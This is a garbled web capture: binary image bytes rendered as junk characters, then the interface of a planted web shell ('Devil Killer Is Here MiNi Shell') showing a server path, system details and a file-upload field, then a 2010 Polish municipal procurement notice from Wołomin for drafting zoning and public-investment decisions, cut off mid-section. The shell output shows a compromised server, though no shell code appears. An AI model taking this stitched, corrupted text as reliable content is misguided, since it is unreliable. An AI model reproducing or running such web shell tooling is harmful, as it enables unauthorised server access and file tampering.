JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100203/24185-N-2010.html

<p class="kh_header"><b>Wołomin: Sporządzenie projektów decyzji o warunkach zabudowy i zagospodarowania terenu dla inwestycji położonych na obszarze Gminy Wołomin w rozumieniu art. 4 ust. 2 pkt. 1 i 2 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003r Nr 80 poz. 717 z późn. zm.)</b><br>
<b>Numer ogłoszenia: 24185 - 2010; data zamieszczenia: 03.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wołomin , ul. Ogrodowa 4, 05-200 Wołomin, woj. mazowieckie, tel. 02 7633000, faks 022 7633066.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.wolomin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie projektów decyzji o warunkach zabudowy i zagospodarowania terenu dla inwestycji położonych na obszarze Gminy Wołomin w rozumieniu art. 4 ust. 2 pkt. 1 i 2 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003r Nr 80 poz. 717 z późn. zm.).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Sporządzenie projektów decyzji o warunkach zabudowy i zagospodarowania terenu dla inwestycji położonych na obszarze Gminy Wołomin w rozumieniu art. 4 ust. 2 pkt. 1 i 2 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003r Nr 80 poz. 717 z późn. zm.).
CZĘŚĆ I  -   obejmuje sporządzenie 325 sztuk projektów decyzji o warunkach zabudowy w rozumieniu art. 4 ust. 2 pkt. 1 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003r Nr 80 poz. 717 z późn. zm.), w tym projektów zmiany decyzji ostatecznych wydanych w tym zakresie,  wraz z niezbędnymi analizami i wynikami tych analiz, o których mowa w rozporządzeniu Ministra Infrastruktury z dnia 26.08.2003r., w oparciu o wnioski o wydanie decyzji o warunkach zabudowy złożone w 2010r.;

Ponadto, przedmiot zamówienia obejmuje także:
1)pobyt przez co najmniej 4 godziny raz w tygodniu, w godzinach pracy urzędu, w siedzibie Urzędu Miejskiego w Wołominie, Wołomin, ul. Ogrodowa 4, osoby sporządzającej projekty decyzji (wpisanej na listę izby samorządu zawodowego urbanistów albo architektów) w celu:
-   wymiany korespondencji oraz zapoznania się z przekazanymi wnioskami;
-  niezwłocznego usunięcia błędów oraz wprowadzenia takich korekt w sporządzonych projektach decyzji, których można dokonać bez przeprowadzenia weryfikacji analizy w terenie;
-  kontaktu z wnioskodawcami w celu wyjaśnienia im treści projektów decyzji i podstaw prawnych i merytorycznych przyjętych rozwiązań.
2)uczestniczenie w postępowaniach administracyjnych w sprawach dotyczących wydania decyzji o warunkach zabudowy i zagospodarowania terenu albo ich zmiany;
3)dostosowanie realizacji zamówienia w ramach zawartej umowy do nowych regulacji prawnych, jeżeli w trakcie trwania umowy nastąpi zmiana przepisów dotyczących ustalania warunków zabudowy i zagospodarowania terenu w przypadku braku miejscowego planu zagospodarowania przestrzennego.

Projekty decyzji i analizy zawierające część tekstową oraz graficzną winny być sporządzone w czytelnej technice zapewniającej możliwość wykonywania ich kopii, w 1 egzemplarzu w wersji papierowej oraz w postaci elektronicznej na nośniku CD w formacie: część tekstowa -  ODT (OpenOffice) i DOC (MS Word) , część graficzna - PDF.
Projekt decyzji, załączniki do decyzji, analiza funkcji oraz zabudowy i zagospodarowania terenu dostarczone Zamawiającemu w formie papierowej winny zawierać dane (imię i nazwisko, nr wpisu na listę członków izby samorządu zawodowego urbanistów lub architektów), podpis osoby sporządzającej oraz pieczęć.
Sporządzony projekt decyzji o warunkach zabudowy wraz z analizą winien zawierać:
a) część tekstową projektu decyzji o warunkach zabudowy zawierającą ustalenia, określone w art. 54 pkt. 1 i 2 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003r. Nr 80, poz. 717 z póżn. zm.), zapisane w sposób zgodny z postanowieniami rozporządzenia  Ministra Infrastruktury z dnia 26.08.2003r. w sprawie oznaczeń i nazewnictwa stosowanych w decyzji o ustaleniu lokalizacji inwestycji celu publicznego oraz w decyzji o warunkach zabudowy (Dz. U. z 2003r. Nr 164, poz. 1589), posiadającą podstawowe części składowe i formę zgodną z art. 107 ustawy z dnia 14.06.1960r. Kodeks postępowania administracyjnego (tj. - Dz. U. z 2000r. Nr 98 poz. 1071 z późn. zm.); projekt decyzji wg przykładowego wzoru A stanowiącego załącznik do wzoru umowy;
b) załączniki tekstowe i graficzne stanowiące integralną część decyzji o warunkach zabudowy:
-  załącznik nr 1 -  w odpowiedniej skali kopia mapy zasadniczej lub w przypadku jej braku kopia mapy katastralnej, przyjęta do państwowego zasobu geodezyjnego i kartograficznego, obejmująca teren, którego wniosek dotyczy i obszar, na który inwestycja będzie oddziaływać, z wyznaczonymi liniami rozgraniczającymi teren inwestycji i liniami zabudowy, z zastosowaniem oznaczeń umożliwiających ich jednoznaczne powiązanie z tekstem decyzji; 
- załącznik nr 2  - wyniki analizy funkcji oraz cech zabudowy i zagospodarowania terenu (wnioski do zastosowania w decyzji)  - część tekstowa, sporządzona wg wzoru B stanowiącego załącznik do wzoru umowy;
- załącznik nr 3 - część graficzna wyników analizy funkcji oraz cech zabudowy i zagospodarowania terenu.
c) analizę funkcji oraz cech zabudowy i zagospodarowania terenu w zakresie warunków, o których mowa w art. 61 ust. 1 - 5 ustawy z dnia 27.03.2003r. o planowaniu i zagospodarowaniu przestrzennym, przeprowadzoną w obszarze analizowanym, wyznaczonym wokół działki budowlanej, której dotyczy wniosek o ustalenie warunków zabudowy, wyznaczonego zgodnie z zasadami określonymi w § 3 ust. 2 rozporządzenia Ministra Infrastruktury z dnia 26.08.2003r. w sprawie sposobu ustalania wymagań dotyczących nowej zabudowy i zagospodarowania terenu w przypadku braku miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003r. Nr 164, poz. 1588), zawierającą:
- część tekstową z charakterystyką zagospodarowania obszaru analizowanego, w tym z opisem sposobu wyznaczenia granic obszaru analizowanego, z zestawieniem parametrów urbanistycznych dla zabudowanych działek sąsiednich w formie tabelarycznej, zawierającym nr ewid. działki, nr obrębu, powierzchnię, powierzchnię zabudowy, powierzchnię utwardzeń, powierzchnię czynną biologicznie, wraz z udziałem procentowym, funkcję budynku, dodatkowe uwagi, z zestawieniem parametrów architektonicznych zabudowy działek sąsiednich w formie tabelarycznej, zawierającym nr ewid. działki, nr obrębu, liczbę kondygnacji nadziemnych, szerokość elewacji frontowej, wysokość górnej krawędzi elewacji frontowej, jej gzymsu lub attyki od poziomu terenu przed głównym wejściem do budynku, kąt nachylenia głównych połaci dachowych, wysokość głównej kalenicy i układ połaci dachowych (dach płaski, mansardowy, jednospadowy, dwuspadowy, wielospadowy, niesymetryczny), dodatkowe uwagi; układ i zakres części tekstowej analizy wg. wzoru C stanowiącego załacznik do wzoru umowy.
- część graficzną sporządzoną z uwzględnieniem nazewnictwa i oznaczeń graficznych stosowanych w decyzji o warunkach zabudowy,
- dokumentację fotograficzną zagospodarowania terenu obszaru analizowanego, złożoną ze zdjęć obrazujących istniejący stan zagospodarowania terenu inwestycji oraz tych działek sąsiednich, których sposób zabudowy stał się podstawą do określenia wymagań dotyczących nowej zabudowy w zakresie kontynuacji funkcji, parametrów, cech i wskaźników kształtowania zabudowy, w tym gabarytów i formy architektonicznej obiektów budowlanych, linii zabudowy.  

Materiały dostarczane przez Zamawiającego:
Zamawiający udostępni  na wniosek Wykonawcy w ciągu 3 dni roboczych od daty doręczenia takiego wniosku wskazane przez Wykonawcę opracowania wyszczególnione w wykazie F, stanowiącym załącznik do wzoru umowy, celem umożliwienia bieżącego wykorzystania jako informacje pomocnicze do wykonania zlecenia, a także inne dokumenty będące w dyspozycji Zamawiającego, w formie elektronicznej, a jeżeli to nie będzie możliwe albo znacznie utrudnione - do wglądu w siedzibie Zamawiającego.

Zamawiający przekaże kopię wniosku sporządzonego na formularzu urzędowym (wzór G stanowiący załącznik 6 do SIWZ) wraz z załącznikami i oryginałem kopii mapy zasadniczej, zawierający stosownie do treści art. 52 ust. 2 ustawy z dnia 27.03.2003r. o planowaniu i zagospodarowaniu przestrzennym:
- określenie planowanego sposobu zagospodarowania terenu oraz charakterystyki zabudowy i zagospodarowania terenu, w tym przeznaczenia i gabarytów projektowanych obiektów budowlanych, przedstawione w formie opisowej oraz rysunkowe schematyczne określenie lokalizacji obiektu wraz jego wymiarami i granicami terenu inwestycji naniesionymi na kopii mapy zasadniczej, 
- dane liczbowe określające wielkość zapotrzebowania na wodę, energię, ilość odprowadzanych lub oczyszczanych ścieków a także innych potrzeb w zakresie infrastruktury technicznej, unieszkodliwiania odpadów,
- określenie charakterystycznych parametrów technicznych inwestycji oraz dane charakteryzujące wpływ na środowisko, w tym:
rodzaj technologii
przewidywanej ilości wykorzystywanej wody do celów technologicznych, surowców, materiałów, paliw  oraz energii,
rozwiązaniach chroniących środowisko,
rodzajach i przewidywanej ilości wprowadzanych do środowiska substancji lub energii.

Zamawiający będzie zlecał sporządzenie projektu decyzji o warunkach zabudowy po upływie terminu do składania przez strony postępowania wniosków i uwag, wyznaczonego w zawiadomieniu o wszczęciu postępowania administracyjnego o wydanie decyzji o warunkach zabudowy.
Zlecenie opracowania pierwszej partii projektów decyzji dla 20 wniosków nastąpi w terminie 3 dni roboczych od daty zawarcia umowy. Kolejne zlecenia będą następować sukcesywnie i bez zbędnej zwłoki po upływie terminu w zawiadomieniach o wszczęciu postępowań.
Zlecenia będą dokonywane w formie pisemnej na podstawie protokołów przekazania materiałów dotyczących przedmiotu umowy.
Proces dokonywania zleceń częściowych przez Zamawiającego zostanie zakończony najpóźniej w terminie do dnia 3o listopada 2010r.
Zamawiający zobowiązuje się do przekazania Wykonawcy kopii uzgodnień projektu decyzji o warunkach zabudowy a także kopii wniesionych uwag przez strony w wyniku dokonanego przez Zamawiającego zawiadomienia o zebranym materiale dowodowym w sprawie, oraz decyzji organu odwoławczego w terminie 3 dni roboczych od daty ich otrzymania.

CZĘŚĆ II -  obejmuje sporządzenie 130 sztuk projektów decyzji o ustaleniu lokalizacji inwestycji celu publicznego w rozumieniu art. 4 ust. 2 pkt. 2 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu  przestrzennym,  w tym projektów zmiany decyzji ostatecznych wydanych w tym zakresie,  wraz z dokonaniem analizy warunków i zasad zagospodarowania terenu oraz jego zabudowy, wynikających z przepisów odrębnych, oraz dokonaniem analizy stanu faktycznego i prawnego terenu, na którym przewiduje się realizację inwestycji, zgodnie z postanowieniami art. 53 ust. 3 powołanej ustawy. 
Ponadto, przedmiot zamówienia obejmuje także:
1) pobyt przez co najmniej 4 godziny raz w tygodniu, w godzinach pracy urzędu, w siedzibie Urzędu Miejskiego w Wołominie, Wołomin, ul. Ogrodowa 4, osoby sporządzającej projekty decyzji (wpisanej na listę izby samorządu zawodowego urbanistów albo architektów) w celu:
-   wymiany korespondencji oraz zapoznania się z przekazanymi wnioskami;
-  niezwłocznego usunięcia błędów oraz wprowadzenia takich korekt w sporządzonych projektach decyzji, których można dokonać bez przeprowadzenia weryfikacji analizy w terenie;
-  kontaktu z wnioskodawcami w celu wyjaśnienia im treści projektów decyzji i podstaw prawnych i merytorycznych przyjętych rozwiązań.
2) uczestniczenie w postępowaniach administracyjnych w sprawach dotyczących wydania decyzji o warunkach zabudowy i zagospodarowania terenu albo ich zmiany;
3) dostosowanie realizacji zamówienia w ramach zawartej umowy do nowych regulacji prawnych, jeżeli w trakcie trwania umowy nastąpi zmiana przepisów dotyczących ustalania warunków zabudowy i zagospodarowania terenu w przypadku braku miejscowego planu zagospodarowania przestrzennego.

Projekty decyzji zawierające część tekstową oraz graficzną winny być sporządzone w czytelnej technice zapewniającej możliwość wykonywania ich kopii, w 1 egzemplarzu w wersji papierowej oraz w postaci elektronicznej na nośniku CD w formacie: część tekstowa -  ODT (OpenOffice) i DOC (MS Word) , część graficzna - PDF.
Projekt decyzji, załączniki do decyzji dostarczone Zamawiającemu w formie papierowej winny zawierać dane (imię i nazwisko, nr wpisu na listę członków izby samorządu zawodowego urbanistów lub architektów), podpis osoby sporządzającej oraz pieczęć.
Sporządzony projekt decyzji o ustaleniu lokalizacji inwestycji celu publicznego winien zawierać:
a) część tekstową projektu decyzji o ustaleniu lokalizacji inwestycji celu publicznego zawierającą ustalenia, określone w art. 54 pkt. 1 i 2 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003r. Nr 80, poz. 717 z póżn. zm.), zapisane w sposób zgodny z postanowieniami rozporządzenia Ministra Infrastruktury z dnia 26.08.2003r. w sprawie oznaczeń i nazewnictwa stosowanych w decyzji o ustaleniu lokalizacji inwestycji celu publicznego oraz w decyzji o warunkach zabudowy (Dz. U. z 2003r. Nr 164, poz. 1589), posiadającą podstawowe części składowe i formę zgodną z art. 107 ustawy z dnia 14.06.1960r. Kodeks postępowania administracyjnego (tj. - Dz. U. z 2000r. Nr 98 poz. 1071 z późn. zm.); projekt decyzji dla inwestycji liniowych wg wzoru D a dla inwestycji kubaturowych wg wzoru E, stanowiących załączniki do wzoru umowy ;
b) załącznik graficzny stanowiący integralną część decyzji o warunkach zabudowy:
- w odpowiedniej skali kopia mapy zasadniczej lub w przypadku jej braku kopia mapy katastralnej, przyjęta do państwowego zasobu geodezyjnego i kartograficznego, obejmująca teren, którego wniosek dotyczy i obszar, na który inwestycja będzie oddziaływać, z wyznaczonymi liniami rozgraniczającymi teren inwestycji.
c) dokumentację fotograficzną zagospodarowania terenu obszaru analizowanego, złożoną ze zdjęć obrazujących istniejący stan zagospodarowania terenu inwestycji oraz działek sąsiednich (obszaru na który inwestycja będzie oddziaływać).  
Materiały dostarczane przez Zamawiającego:
1)Zamawiający udostępni  na wniosek Wykonawcy w ciągu 3 dni roboczych od daty doręczenia takiego wniosku wskazane przez Wykonawcę opracowania wyszczególnione w wykazie F stanowiącym załącznik do wzoru umowy celem umożliwienia bieżącego wykorzystania jako informacje pomocnicze do wykonania zlecenia, a także inne dokumenty będące w dyspozycji Zamawiającego, w formie elektronicznej, a jeżeli to nie będzie możliwe albo znacznie utrudnione - do wglądu w siedzibie Zamawiającego.
2)Zamawiający przekaże kopię wniosku sporządzonego na formularzu urzędowym (wzór G) wraz z załącznikami i oryginałem kopii mapy zasadniczej, zawierający stosownie do treści art. 52 ust. 2 ustawy z dnia 27.03.2003r. o planowaniu i zagospodarowaniu przestrzennym:
- określenie planowanego sposobu zagospodarowania terenu oraz charakterystyki zabudowy i zagospodarowania terenu, w tym przeznaczenia i gabarytów projektowanych obiektów budowlanych, przedstawione w formie opisowej oraz rysunkowe schematyczne określenie lokalizacji obiektu wraz jego wymiarami i granicami terenu inwestycji naniesionymi na kopii mapy zasadniczej, 
- dane liczbowe określające wielkość zapotrzebowania na wodę, energię, ilość odprowadzanych lub oczyszczanych ścieków a także innych potrzeb w zakresie infrastruktury technicznej, unieszkodliwiania odpadów,
- określenie charakterystycznych parametrów technicznych inwestycji oraz dane charakteryzujące wpływ na środowisko, w tym:
rodzaj technologii
przewidywanej ilości wykorzystywanej wody do celów technologicznych, surowców, materiałów, paliw  oraz energii,
rozwiązaniach chroniących środowisko,
rodzajach i przewidywanej ilości wprowadzanych do środowiska substancji lub energii.
3)Zamawiający będzie zlecał sporządzenie projektu decyzji o ustaleniu lokalizacji inwestycji celu publicznego po upływie terminu do składania przez strony postępowania wniosków i uwag, wyznaczonego w zawiadomieniu o wszczęciu postępowania administracyjnego o wydanie i obwieszczeniu.
 4) Zlecenie opracowania pierwszej partii projektów decyzji dla wniosków nastąpi w terminie 3 dni   roboczych od daty zawarcia umowy. Kolejne zlecenia będą następować sukcesywnie i bez zbędnej zwłoki po upływie terminu w zawiadomieniach o wszczęciu postępowań.
     5) Zlecenia będą dokonywane w formie pisemnej na podstawie protokołów przekazania materiałów dotyczących przedmiotu umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówienia jest: Sporządzenie projektów decyzji o warunkach zabudowy i zagospodarowania terenu dla inwestycji położonych na obszarze Gminy Wołomin w rozumieniu art. 4 ust. 2 pkt. 1 i 2 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003r Nr 80 poz. 717 z późn. zm.)</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagne</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż w/w warunki WYKONAWCA spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż w/w warunki WYKONAWCA spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż w/w warunki WYKONAWCA spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż w/w warunki WYKONAWCA spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
